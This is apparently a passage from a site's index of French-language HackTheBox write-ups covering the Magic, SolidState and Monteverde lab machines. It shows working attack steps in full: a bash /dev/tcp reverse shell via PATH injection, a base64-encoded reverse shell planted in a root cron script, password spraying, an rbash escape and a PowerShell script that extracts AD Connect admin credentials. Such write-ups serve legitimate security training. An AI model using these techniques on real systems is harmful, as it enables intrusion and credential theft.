cat id_rsa.pub \u0026gt; authorized_keys theseus@magic:~/.ssh$ cat id_rsa ... ## [Ctrl-C, Ctrl-V] --\u0026gt; copie de la clé privée sur la machine hôte ------------------------- $ vim theseus.key ... $ chmod 600 theseus.key $ ssh theseus@10.10.10.185 -i theseus.key Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64) ... theseus@magic:~$ whoami theseus Privilege Escalation SUID binary : /bin/sysinfo On découvre que le binaire \u0026ldquo;/bin/sysinfo\u0026rdquo; a le bit SUID activé, grâce à l\u0026rsquo;énumeration avec linpeas.\n1 2 3 4 5 6 7 theseus@magic:~$ cat linpeas.out | grep -i SUID ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid ... -rwsr-x--- 1 root users 22K Oct 21 2019 /bin/sysinfo (Unknown SUID binary!) ... fdisk execution in /bin/sysinfo Pour faire une attaque \u0026ldquo;PATH injection\u0026rdquo; sur le binaire SUID, j\u0026rsquo;ai pu utiliser strace, ltrace ou encore strings:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 theseus@magic:~/bin$ strings /bin/sysinfo | less /lib64/ld-linux-x86-64.so.2 libstdc++.so.6 __gmon_start__ _ITM_deregisterTMCloneTable ... ... ====================Hardware Info==================== lshw -short ====================Disk Info==================== fdisk -l ====================CPU Info==================== cat /proc/cpuinfo ====================MEM Usage===================== ... On observe l\u0026rsquo;execution de lshw, fdisk ou encore cat, sans le path absolu. Ex: /bin/cat. On peut donc faire une PATH injection. J\u0026rsquo;ai choisi de le faire avec fdisk.\nCreating fake \u0026ldquo;fdisk\u0026rdquo; binary with reverse shell On crée un faux binaire fdisk dans le dossier bin/ qu\u0026rsquo;on ajoute ensuite au PATH :\n1 2 3 4 5 theseus@magic:~$ mkdir bin;cd bin theseus@magic:~/bin$ nano fdisk ##!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.2/1337 0\u0026gt;\u0026amp;1 theseus@magic:~/bin$ export PATH=\u0026#34;/home/theseus/bin:$PATH\u0026#34; Root shell using PATH injection On execute ensuite le binaire /bin/sysinfo, qui va executer la commande fdisk en tant que root. Comme mon dossier bin contient aussi un binaire fdisk, ET qu\u0026rsquo;il est en en premier dans la liste des dossiers du PATH, alors le programme va décider de l\u0026rsquo;executer à la place du véritable binaire :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 theseus@magic:~/bin$ /bin/sysinfo ====================Hardware Info==================== H/W path Device Class Description ==================================================== system VMware Virtual Platform /0 bus 440BX Desktop Reference Platform /0/0 memory 86KiB BIOS /0/1 processor AMD EPYC 7763 64-Core Processor /0/1/0 memory 16KiB L1 cache /0/1/1 memory 16KiB L1 cache /0/1/2 memory 512KiB L2 cache /0/1/3 memory 512KiB L2 cache ... ====================Disk Info==================== ------------------------------ $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.185. Ncat: Connection from 10.10.10.185:48804. root@magic:~/bin# whoami root root@magic:~# cd /root root@magic:/root# cat root.txt c21a.....fa6b ","date":"2025-07-24T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/magic-htb/","title":"HTB | Magic"},{"content":" Machine name OS IP Difficulty SolidState Linux 10.10.10.51 Medium Users 1 mindy : P@55W0rd1!2@ Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.51 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 770084f578b9c7d354cf712e0d526d8b (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z | 256 78b83af660190691f553921d3f48ed53 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE= | 256 e445e9ed074d7369435a12709dc4af76 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY 25/tcp open smtp syn-ack ttl 63 JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.3 [10.10.14.3]) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: OPTIONS HEAD GET POST 110/tcp open pop3 syn-ack ttl 63 JAMES pop3d 2.3.2 119/tcp open nntp syn-ack ttl 63 JAMES nntpd (posting ok) 4555/tcp open rsip? syn-ack ttl 63 | fingerprint-strings: | GenericLines: | JAMES Remote Administration Tool 2.3.2 | Please enter your login and password | Login id: | Password: | Login failed for |_ Login id: Foothold JAMES Remote Administration Tool 2.3.2 (port 5557) On observe un service tournant sur le port 5557, demandant un user/password. En cherchant sur internet, on trouve des credentials par défaut pour cet outil : root / root\nOn peut alors lister les users, et changer leur mot de passe permettant l\u0026rsquo;accès à leur boite mail. Ici, on change le mot de passe de l\u0026rsquo;utilisateur mindy, password : mindy.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 telnet 10.10.10.51 4555 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is \u0026#39;^]\u0026#39;. JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands HELP Currently implemented commands: help display this help listusers display existing accounts countusers display the number of existing accounts adduser [username] [password] add a new user verify [username] verify if specified user exist deluser [username] delete existing user setpassword [username] [password] sets a user\u0026#39;s password setalias [user] [alias] locally forwards all email for \u0026#39;user\u0026#39; to \u0026#39;alias\u0026#39; showalias [username] shows a user\u0026#39;s current email alias unsetalias [user] unsets an alias for \u0026#39;user\u0026#39; setforwarding [username] [emailaddress] forwards a user\u0026#39;s email to another email address showforwarding [username] shows a user\u0026#39;s current email forwarding unsetforwarding [username] removes a forward user [repositoryname] change to another user repository shutdown kills the current JVM (convenient when James is run as a daemon) quit close connection listusers Existing accounts 6 user: james user: ../../../../../../../../etc/bash_completion.d user: thomas user: john user: mindy user: mailadmin setpassword mindy mindy Password for mindy reset quit Bye Connection closed by foreign host. POP3 : mindy mails En utilisant thunderbird on tente d\u0026rsquo;accéder à ses mails. Une vrai galère\u0026hellip; (pas réussi).\nAvec telnet, on se connecte au port 110 (POP3) avec l\u0026rsquo;utilisateur mindy. On trouve 2 emails, que l\u0026rsquo;on récupère :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is \u0026#39;^]\u0026#39;. USER mindy PASS mindy LIST +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready +OK +OK Welcome mindy +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows Return-Path: \u0026lt;mailadmin@localhost\u0026gt; Message-ID: \u0026lt;5420213.0.1503422039826.JavaMail.root@solidstate\u0026gt; MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798 for \u0026lt;mindy@localhost\u0026gt;; Tue, 22 Aug 2017 13:13:42 -0400 (EDT) Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT) From: mailadmin@localhost Subject: Welcome Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you. We are looking forward to you joining our team and your success at Solid State Security. Respectfully, James . RETR 2 +OK Message follows Return-Path: \u0026lt;mailadmin@localhost\u0026gt; Message-ID: \u0026lt;16744123.2.1503422270399.JavaMail.root@solidstate\u0026gt; MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for \u0026lt;mindy@localhost\u0026gt;; Tue, 22 Aug 2017 13:17:28 -0400 (EDT) Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT) From: mailadmin@localhost Subject: Your Access Dear Mindy, Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. username: mindy pass: P@55W0rd1!2@ Respectfully, James . EXIT -ERR QUIT +OK Apache James POP3 Server signing off. Connection closed by foreign host. Dans le deuxième email, on trouve des credentials en clair: mindy : P@55W0rd1!2@\nSSH Connection to mindy account : user flag On se connecte en ssh à mindy et on récupère le flag utilisateur user.txt.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ ssh mindy@10.10.10.51 mindy@10.10.10.51\u0026#39;s password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142 mindy@solidstate:~$ cat user.txt c00a.....c6b2 Privilege Escalation mindy : restricted bash Par défaut, on arrive dans un restricted shell. Presque aucune action n\u0026rsquo;est autorisé\u0026hellip;\n1 2 3 4 5 6 mindy@solidstate:~$ ls bin user.txt mindy@solidstate:~$ cd .. -rbash: cd: restricted mindy@solidstate:~$ /bin/ls -rbash: /bin/ls: restricted: cannot specify `/\u0026#39; in command names Mais grâce à ssh, on peut préciser une commande à executer au lancement. Par exemple, lui demander de lancer un bash, ce qui permet de bypasser le lancement du restricted bash !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ ssh mindy@10.10.10.51 bash mindy@10.10.10.51\u0026#39;s password: ls bin user.txt cd .. ls james mindy ---------------------- $ ssh mindy@10.10.10.51 -t \u0026#34;bash --noprofile\u0026#34; mindy@10.10.10.51\u0026#39;s password: ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls bin user.txt ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd .. ${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls james mindy ${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ exit Connection to 10.10.10.51 closed. root file : /opt/tmp.py A l\u0026rsquo;aide linpeas et/ou linenum, on découvre un fichier /opt/tmp.py qui semble vider le dossier /tmp en utilisant os.system(). Les droits du fichier sont 777 (rwxrwxrwx). Le fichier appartient à root mais est modifiable par n\u0026rsquo;importe qui, dont mindy. J\u0026rsquo;ai donc essayer de mettre une commande pour faire un reverse shell. Au vu de ce que fait ce script, on peut déduire qu\u0026rsquo;il doit etre executé dans une cronjob probablement en tant que root.\nAprès quelques minutes, je reçois bien un shell en tant que root sur la machine, ce qui prouve notre théorie :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py ##!/usr/bin/env python import os import sys ## Reverse shell os.system(\u0026#39;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi44LzkwMDEgMD4mMQ== | base64 -d | bash\u0026#39;) ## Code initial du script try: os.system(\u0026#39;rm -r /tmp/* \u0026#39;) except: sys.exit() -------------------------------------------- $ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.51. Ncat: Connection from 10.10.10.51:58410. bash: cannot set terminal process group (31712): Inappropriate ioctl for device bash: no job control in this shell root@solidstate:~# whoami whoami root root@solidstate:~# cat /root/root.txt cat /root/root.txt 0574.....d2b9 Tips TOUJOURS bien regarder en détail l\u0026rsquo;execution de linpeas ou de linenum. Parfois, on peut rater des fichiers/binaires, qui ne sont pas habituels. Par exemple ici, on avait /opt/tmp.py qui aurait du me sauter aux yeux. Ces fichiers ne sont pas forcément surlignés en rouge\u0026hellip; ","date":"2025-07-22T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/solidstate-htb/","title":"HTB | SolidState"},{"content":" Machine name OS IP Difficulty Monteverde Windows 10.10.10.172 Medium Users 1 2 3 SABatchJobs:SABatchJobs mhope:4n0therD4y@n0th3r$ administrator:d0m@in4dminyeah! Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.172 Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-17 23:38 CEST ... PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-17 21:39:43Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49673/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49750/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Foothold Getting users using nxc Avec nxc smb et l\u0026rsquo;utilisateur anonyme on récupère une liste d\u0026rsquo;utilisateurs.\n1 2 3 4 5 6 7 8 9 10 11 $ nxc smb 10.10.10.172 -u \u0026#39;\u0026#39; -p \u0026#39;\u0026#39; --users | tr -s \u0026#39; \u0026#39; | cut -d \u0026#39; \u0026#39; -f 5 | head -n13 | tail -n 10 | tee users.txt Guest AAD_987d7f2f57d2 mhope SABatchJobs svc-ata svc-bexec svc-netapp dgalanos roleary smorgan Password Spray On tente un password spray avec \u0026ldquo;user == password\u0026rdquo; et on découvre les identifiants suivants:\nSABatchJobs:SABatchJobs 1 2 3 4 5 6 7 8 9 10 11 12 $ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success --no-bruteforce SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\Guest:Guest STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\mhope:mhope STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\\SABatchJobs:SABatchJobs SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-ata:svc-ata STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-bexec:svc-bexec STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\svc-netapp:svc-netapp STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\dgalanos:dgalanos STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\roleary:roleary STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\\smorgan:smorgan STATUS_LOGON_FAILURE \u0026lsquo;user$\u0026rsquo; and \u0026lsquo;azure_uploads\u0026rsquo; smb shares : READ ACCESS Avec smbmap on trouve le share \u0026lsquo;user$\u0026rsquo; et \u0026lsquo;azure_uploads\u0026rsquo; accessibles en lecture :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 smbmap -H \u0026#34;10.10.10.172\u0026#34; -u SABatchJobs -p SABatchJobs ________ ___ ___ _______ ___ ___ __ _______ /\u0026#34; )|\u0026#34; \\ /\u0026#34; || _ \u0026#34;\\ |\u0026#34; \\ /\u0026#34; | /\u0026#34;\u0026#34;\\ | __ \u0026#34;\\ (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :) \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /\u0026#39; /\\ \\ |: ____/ __/ \\ |: \\. |(| _ \\ |: \\. | // __\u0026#39; \\ (| / /\u0026#34; \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\ (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB connections(s) and 1 authenticated session(s) [+] IP: 10.10.10.172:445\tName: MEGABANK.LOCAL Status: Authenticated Disk Permissions\tComment ---- -----------\t------- ADMIN$ NO ACCESS\tRemote Admin azure_uploads READ ONLY\tC$ NO ACCESS\tDefault share E$ NO ACCESS\tDefault share IPC$ READ ONLY\tRemote IPC NETLOGON READ ONLY\tLogon server share SYSVOL READ ONLY\tLogon server share users$ READ ONLY On remarque que azure_uploads est vide.\nDans users$ on trouve le dossier d\u0026rsquo;un autre utilisateur \u0026ldquo;mhope\u0026rdquo; avec un fichier azure.xml :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ smbclient //10.10.10.172/users$ -U MEGABANK.LOCAL/SABatchJobs Password for [MEGABANK.LOCAL\\SABatchJobs]: Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . D 0 Fri Jan 3 14:12:48 2020 .. D 0 Fri Jan 3 14:12:48 2020 dgalanos D 0 Fri Jan 3 14:12:30 2020 mhope D 0 Fri Jan 3 14:41:18 2020 roleary D 0 Fri Jan 3 14:10:30 2020 smorgan D 0 Fri Jan 3 14:10:24 2020 31999 blocks of size 4096. 28979 blocks available smb: \\\u0026gt; cd mhope smb: \\mhope\\\u0026gt; ls . D 0 Fri Jan 3 14:41:18 2020 .. D 0 Fri Jan 3 14:41:18 2020 azure.xml AR 1212 Fri Jan 3 14:40:23 2020 31999 blocks of size 4096. 28979 blocks available smb: \\mhope\\\u0026gt; get azure.xml getting file \\mhope\\azure.xml of size 1212 as azure.xml (15.0 KiloBytes/sec) (average 15.0 KiloBytes/sec) Dans ce fichier se trouve un mot de passe 4n0therD4y@n0th3r$:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 cat azure.xml ��\u0026lt;Objs Version=\u0026#34;1.1.0.1\u0026#34; xmlns=\u0026#34;http://schemas.microsoft.com/powershell/2004/04\u0026#34;\u0026gt; \u0026lt;Obj RefId=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;TN RefId=\u0026#34;0\u0026#34;\u0026gt; \u0026lt;T\u0026gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential\u0026lt;/T\u0026gt; \u0026lt;T\u0026gt;System.Object\u0026lt;/T\u0026gt; \u0026lt;/TN\u0026gt; \u0026lt;ToString\u0026gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential\u0026lt;/ToString\u0026gt; \u0026lt;Props\u0026gt; \u0026lt;DT N=\u0026#34;StartDate\u0026#34;\u0026gt;2020-01-03T05:35:00.7562298-08:00\u0026lt;/DT\u0026gt; \u0026lt;DT N=\u0026#34;EndDate\u0026#34;\u0026gt;2054-01-03T05:35:00.7562298-08:00\u0026lt;/DT\u0026gt; \u0026lt;G N=\u0026#34;KeyId\u0026#34;\u0026gt;00000000-0000-0000-0000-000000000000\u0026lt;/G\u0026gt; \u0026lt;S N=\u0026#34;Password\u0026#34;\u0026gt;4n0therD4y@n0th3r$\u0026lt;/S\u0026gt; \u0026lt;/Props\u0026gt; \u0026lt;/Obj\u0026gt; \u0026lt;/Objs\u0026gt;# Evil-winrm : mhope -\u0026gt; user flag On obtient un accès via evil winrm en tant que mhope avec le mot de passe trouvé précédemment 4n0therD4y@n0th3r$ :\n1 2 3 4 5 6 7 8 evil-winrm -u mhope -p \u0026#39;4n0therD4y@n0th3r$\u0026#39; -i \u0026#34;10.10.10.172\u0026#34; Evil-WinRM shell v3.7 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\mhope\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\mhope\\Desktop\u0026gt; cat \u0026#34;C:/Users/mhope/Desktop/user.txt\u0026#34; 4437.....5f01 Privilege Escalation mhope Group : Azure Admins On observe que mhope fait partie du groupe Azure Admins.\n1 2 3 4 5 6 7 8 9 10 *Evil-WinRM* PS C:\\Users\\mhope\\Documents\u0026gt; whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ======================================= ... MEGABANK\\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group ... SQL Server: ADSync database On observer une processus \u0026ldquo;sqlservr\u0026rdquo;.\n1 2 3 4 5 *Evil-WinRM* PS C:\\Users\\mhope\\Documents\u0026gt; Get-Process sqlservr Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 832 114 406004 275560 3436 0 sqlservr On remarque que sqlcmd est installé et on observe une base de donnée \u0026ldquo;ADSync\u0026rdquo;. On peut bien effectuer des requêtes vers la base de donnée sans utiliser de user/password :\n1 2 3 4 5 6 7 8 9 10 *Evil-WinRM* PS C:\\Users\\mhope\\Documents\u0026gt; sqlcmd -Q \u0026#39;SELECT name FROM sys.databases\u0026#39; name -------------------------------------------------------------------------------------------------------------------------------- master tempdb model msdb ADSync (5 rows affected) Script On trouve un script de xpn sur github. Ce script permet de se connecter à la base de donnée ADSync, d\u0026rsquo;extraire la configuration (chiffrée), puis de la déchiffrer. On obtient alors le mot de passe de l\u0026rsquo;administrator. Le script est basé sur l\u0026rsquo;utilisation des infos de la base de données puis du binaire \u0026lsquo;C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll\u0026rsquo; pour réussir à récupérer la configuration contenant les creds administrateur :\nhttps://gist.github.com/xpn/0dc393e944d8733e3c63023968583545\nEn utilisant le script, on remarque qu\u0026rsquo;il ne fonctionne pas. Les lignes de code permettant la connection à la base de données semblent incorrectes :\n1 2 *Evil-WinRM* PS C:\\Users\\mhope\\Documents\u0026gt; $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList \u0026#34;Data Source=(localdb)\\.\\ADSync;Initial Catalog=ADSync\u0026#34; $client.Open() En cherchant sur internet, j\u0026rsquo;ai pu corriger la ligne de code permettant la connexion à la bdd. De plus, j\u0026rsquo;ai pu remarquer certaines erreurs avec des guillemets dans un format suspect. J\u0026rsquo;ai bien remplacé les guillemets par \u0026ldquo;\u0026rsquo;\u0026rdquo; ou \u0026lsquo;\u0026quot;\u0026rsquo;.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 Write-Host \u0026#34;AD Connect Sync Credential Extract POC\u0026#34; $SQLServer = \u0026#34;127.0.0.1\u0026#34; $SQLDBName = \u0026#34;ADSync\u0026#34; $client = New-Object System.Data.SqlClient.SqlConnection $client.ConnectionString = \u0026#34;Server = $SQLServer; Database = $SQLDBName; Integrated Security = True\u0026#34; $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = \u0026#34;SELECT keyset_id, instance_id, entropy FROM mms_server_configuration\u0026#34; $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = \u0026#34;SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = \u0026#39;AD\u0026#39;\u0026#34; $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path \u0026#39;C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll\u0026#39; $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) Write-Host $decrypted $domain = select-xml -Content $config -XPath \u0026#34;//parameter[@name=\u0026#39;forest-login-domain\u0026#39;]\u0026#34; | select @{Name = \u0026#39;Domain\u0026#39;; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath \u0026#34;//parameter[@name=\u0026#39;forest-login-user\u0026#39;]\u0026#34; | select @{Name = \u0026#39;Username\u0026#39;; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath \u0026#34;//attribute\u0026#34; | select @{Name = \u0026#39;Password\u0026#39;; Expression = {$_.node.InnerXML}} Write-Host (\u0026#34;Domain: \u0026#34; + $domain.Domain) Write-Host (\u0026#34;Username: \u0026#34; + $username.Username) Write-Host (\u0026#34;Password: \u0026#34; + $password.Password) Output Après correction des guillements, on execute le .ps1 et obtient les creds admin :\n1 2 3 4 5 6 7 8 9 *Evil-WinRM* PS C:\\Users\\mhope\\Documents\u0026gt; .\\decrypt.ps1 AD Connect Sync Credential Extract POC \u0026lt;encrypted-attributes\u0026gt; \u0026lt;attribute name=\u0026#34;password\u0026#34;\u0026gt;d0m@in4dminyeah!\u0026lt;/attribute\u0026gt; \u0026lt;/encrypted-attributes\u0026gt; Domain: MEGABANK.LOCAL Username: administrator Password: d0m@in4dminyeah! Administrator pwned 1 2 3 4 5 6 7 8 [Jul 20, 2025 - 14:56:12 (CEST)] exegol-pentest Monteverde # evil-winrm -u \u0026#34;administrator\u0026#34; -p \u0026#39;d0m@in4dminyeah!\u0026#39; -i 10.10.10.172 Evil-WinRM shell v3.7 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; cat root.txt 9f15.....9bf4 Tips Toujours bien vérifier les scripts trouvés. Debug puis trouver l\u0026rsquo;erreur. Attention au guillemets suspects, toujours remplacer par \u0026lsquo;\u0026quot;\u0026rsquo; ou \u0026lsquo;\u0026quot;\u0026rsquo;. ","date":"2025-07-20T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/monteverde-htb/","title":"HTB | Monteverde"},{"content":" Machine name OS IP Difficulty Planning Linux 10.10.11.68 Easy Soon :)\n","date":"2025-07-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/planning-htb/","title":"HTB | Planning"},{"content":" Machine name OS IP 